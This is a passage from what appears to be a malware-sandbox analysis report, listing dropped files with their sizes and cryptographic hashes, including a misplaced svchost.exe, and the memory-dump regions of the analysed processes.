SHA256b8ce7b4cad3a93f06ac242ddde356e00261614b185e4edc009b07a729172b6b9
SHA512062f0467886176c611f7d56fe35837a1c62ccdb47f75b147930fae76aff7a982a2e4b967f0c23b96084f1b24ce734c21b69da7c1c061f59c8f204142514f02c1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD50ee58e77690ee14d598005ee556bf766
SHA12221d296e3be26871cb6e8ca23bf1ecf698695dd
SHA256a911cc32a399226932958e5edb8d0b574d3270d164f703bdcd9d755703729dac
SHA512fe08f5590197ca4148e3782f6420dae3be819eb87aa8bff5ac66953deea970a86aaa90e75d12b969cb6750033603895ed87b07eb5eba1309b10daf27fcc6016d
-
C:\Users\Admin\AppData\Local\Temp\TarF686.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5dba794ecebf190390f0fbd3fc5a85292
SHA11838ef678a52c7c508baaf77c94385c1482f9a1d
SHA25610f7a9a6d46a89d5c09990f27daeae4acca8f6b15eca3899791b5d75f54e6a25
SHA51289feaad166adcc8af4a6093df1176480844c10921d579dd5afe632f60ab68be5401b07389d19c3d373639fd7bdc3647553d227bf1acc9df92f7e6e001ffc186f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H6TDJCB6L3POM9E6U20Y.tempFilesize
7KB
MD5c179b5f59357a37681e177cb9e084448
SHA1b031b43f49095eea43266eb314aec0437c7191cf
SHA2569868876ae0e8f3ad9f78c4805614b20455707164464daa6c9147b1166b979771
SHA512ad95a125535dace75f5bcd954385cfac3479ac4441686e470c4b7da76396f5384f950fe732c27503387a8b4c0cb1fd148b73e7967e37b745336f6f2ea1ca7d45
-
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\output1[1].jpgFilesize
393KB
MD572e28e2092a43e0d70289f62bec20e65
SHA1944f2b81392ee946f4767376882c5c1bda6dddb5
SHA2566ec8fe67dc01d8c3de9cfc94ca49ae25e46ed61f5a48f1a956ef269efa4ae08f
SHA51231c0587cd1df4d63088973d72a015b144b64411031ac4c1904c54c4f43b5990b8016cc6d29e3b0238f86432005588c72b98806306918fdaf2786498de340e466
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\~tlDA1A.tmpFilesize
393KB
MD59dbdd43a2e0b032604943c252eaf634a
SHA19584dc66f3c1cce4210fdf827a1b4e2bb22263af
SHA25633c53cd5265502e7b62432dba0e1b5ed702b5007cc79973ccd1e71b2acc01e86
SHA512b7b20b06dac952a96eda254bad29966fe7a4f827912beb0bc66d5af5b302d7c0282d70c1b01ff782507dd03a1d58706f05cb157521c7f2887a43085ffe5f94d1
-
\Users\Admin\AppData\Local\Temp\~tlFA34.tmpFilesize
385KB
MD5e802c96760e48c5139995ffb2d891f90
SHA1bba3d278c0eb1094a26e5d2f4c099ad685371578
SHA256cb82ea45a37f8f79d10726a7c165aa5b392b68d5ac954141129c1762a539722c
SHA51297300ac501be6b6ea3ac1915361dd472824fe612801cab8561a02c7df071b1534190d2d5ef872d89d24c8c915b88101e7315f948f53215c2538d661181e3a5f0
-
\Windows\system\svchost.exeFilesize
9.4MB
MD5db3edf03a8a2c8e96fe2d2deaaec76ff
SHA12d9c9f3a5d06f11c5c881a9df90ba33cc2894ac1
SHA256a40cac0b6ee1729cdb6fca3c950e533b913c2729afbd2fde045e86cc62c0ff60
SHA512121b6ba2c7a91a8639b4b88d9965528df245534ec65c4f1d463dbcc3aa2719debb4417a1a7d919527155097cc00521576b25b2d061b149d0c8b82ca999054135
-
memory/868-456-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/868-457-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/868-469-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/868-508-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/876-786-0x0000000140000000-0x0000000140170400-memory.dmpFilesize
1.4MB
-
memory/876-770-0x0000000140000000-0x0000000140170400-memory.dmpFilesize
1.4MB
-
memory/1884-479-0x0000000002910000-0x0000000002990000-memory.dmpFilesize
512KB
-
memory/1884-477-0x0000000002910000-0x0000000002990000-memory.dmpFilesize
512KB
-
memory/1884-480-0x0000000002910000-0x0000000002990000-memory.dmpFilesize
512KB
-
memory/1884-481-0x0000000002910000-0x0000000002990000-memory.dmpFilesize
512KB
-
memory/1884-490-0x000007FEF59E0000-0x000007FEF637D000-memory.dmpFilesize
9.6MB
-
memory/1884-478-0x000007FEF59E0000-0x000007FEF637D000-memory.dmpFilesize
9.6MB
-
memory/1884-476-0x000007FEF59E0000-0x000007FEF637D000-memory.dmpFilesize
9.6MB
-
memory/1884-475-0x0000000002410000-0x0000000002418000-memory.dmpFilesize
32KB
-
memory/1976-43-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/1976-48-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/1976-468-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/1976-45-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/1976-74-0x0000000180000000-0x000000018070E000-memory.dmpFilesize
7.1MB
-
memory/2100-526-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/2100-528-0x0000000002484000-0x0000000002487000-memory.dmpFilesize
12KB
-
memory/2100-529-0x000007FEF58F0000-0x000007FEF628D000-memory.dmpFilesize
9.6MB
-
memory/2100-525-0x000007FEF58F0000-0x000007FEF628D000-memory.dmpFilesize
9.6MB
-
memory/2104-766-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/2104-636-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/2172-0-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/2172-2-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/2172-1-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/2172-4-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/2172-12-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/2172-46-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/2172-3-0x0000000140000000-0x0000000140A64400-memory.dmpFilesize
10.4MB
-
memory/2264-523-0x0000000002B40000-0x0000000002BC0000-memory.dmpFilesize
512KB
-
memory/2264-524-0x000007FEF58F0000-0x000007FEF628D000-memory.dmpFilesize
9.6MB
-
memory/2264-522-0x000007FEF58F0000-0x000007FEF628D000-memory.dmpFilesize
9.6MB
-
memory/2264-517-0x0000000001FA0000-0x0000000001FA8000-memory.dmpFilesize
32KB
-
memory/2264-516-0x000000001B340000-0x000000001B622000-memory.dmpFilesize
2.9MB
-
memory/2264-527-0x0000000002B44000-0x0000000002B47000-memory.dmpFilesize
12KB
-
memory/2408-31-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmpFilesize
9.6MB
-
memory/2408-30-0x0000000002450000-0x00000000024D0000-memory.dmpFilesize
512KB
-
memory/2408-27-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmpFilesize
9.6MB
-
memory/2408-28-0x0000000002450000-0x00000000024D0000-memory.dmpFilesize
512KB
-
memory/2408-29-0x0000000002450000-0x00000000024D0000-memory.dmpFilesize
512KB
-
memory/2408-26-0x0000000002450000-0x00000000024D0000-memory.dmpFilesize
512KB
-
memory/2408-25-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmpFilesize
9.6MB
-
memory/2544-575-0x0000000140000000-0x0000000140170400-memory.dmpFilesize
1.4MB
-
memory/2544-548-0x0000000140000000-0x0000000140170400-memory.dmpFilesize
1.4MB
-
memory/2744-488-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/2744-491-0x0000000002710000-0x0000000002790000-memory.dmpFilesize
512KB
-
memory/2744-487-0x000007FEF59E0000-0x000007FEF637D000-memory.dmpFilesize
9.6MB
-
memory/2744-492-0x000007FEF59E0000-0x000007FEF637D000-memory.dmpFilesize
9.6MB
-
memory/2744-489-0x000007FEF59E0000-0x000007FEF637D000-memory.dmpFilesize
9.6MB
-
memory/2760-16-0x0000000002590000-0x0000000002610000-memory.dmpFilesize
512KB
-
memory/2760-13-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmpFilesize
9.6MB
-
memory/2760-10-0x000000001B350000-0x000000001B632000-memory.dmpFilesize
2.9MB
-
memory/2760-15-0x0000000002590000-0x0000000002610000-memory.dmpFilesize
512KB
-
memory/2760-11-0x0000000002460000-0x0000000002468000-memory.dmpFilesize
32KB
-
memory/2760-17-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmpFilesize
9.6MB
-
memory/2760-18-0x0000000002590000-0x0000000002610000-memory.dmpFilesize
512KB
-
memory/2760-20-0x000007FEF5F50000-0x000007FEF68ED000-memory.dmpFilesize
9.6MB
-
memory/2760-14-0x0000000002590000-0x0000000002610000-memory.dmpFilesize
512KB
-
memory/2996-71-0x00000000023C0000-0x0000000002440000-memory.dmpFilesize
512KB
-
memory/2996-69-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/2996-67-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/2996-68-0x00000000023C0000-0x0000000002440000-memory.dmpFilesize
512KB
-
memory/2996-73-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/2996-72-0x00000000023C0000-0x0000000002440000-memory.dmpFilesize
512KB
-
memory/3052-56-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/3052-59-0x0000000002930000-0x00000000029B0000-memory.dmpFilesize
512KB
-
memory/3052-54-0x000000001B3A0000-0x000000001B682000-memory.dmpFilesize
2.9MB
-
memory/3052-70-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/3052-57-0x0000000002930000-0x00000000029B0000-memory.dmpFilesize
512KB
-
memory/3052-55-0x0000000002220000-0x0000000002228000-memory.dmpFilesize
32KB
-
memory/3052-58-0x000007FEF55B0000-0x000007FEF5F4D000-memory.dmpFilesize
9.6MB
-
memory/3052-60-0x0000000002930000-0x00000000029B0000-memory.dmpFilesize
512KB
-
memory/3064-544-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/3064-507-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/3064-506-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB
-
memory/3064-509-0x0000000140000000-0x000000014015E400-memory.dmpFilesize
1.4MB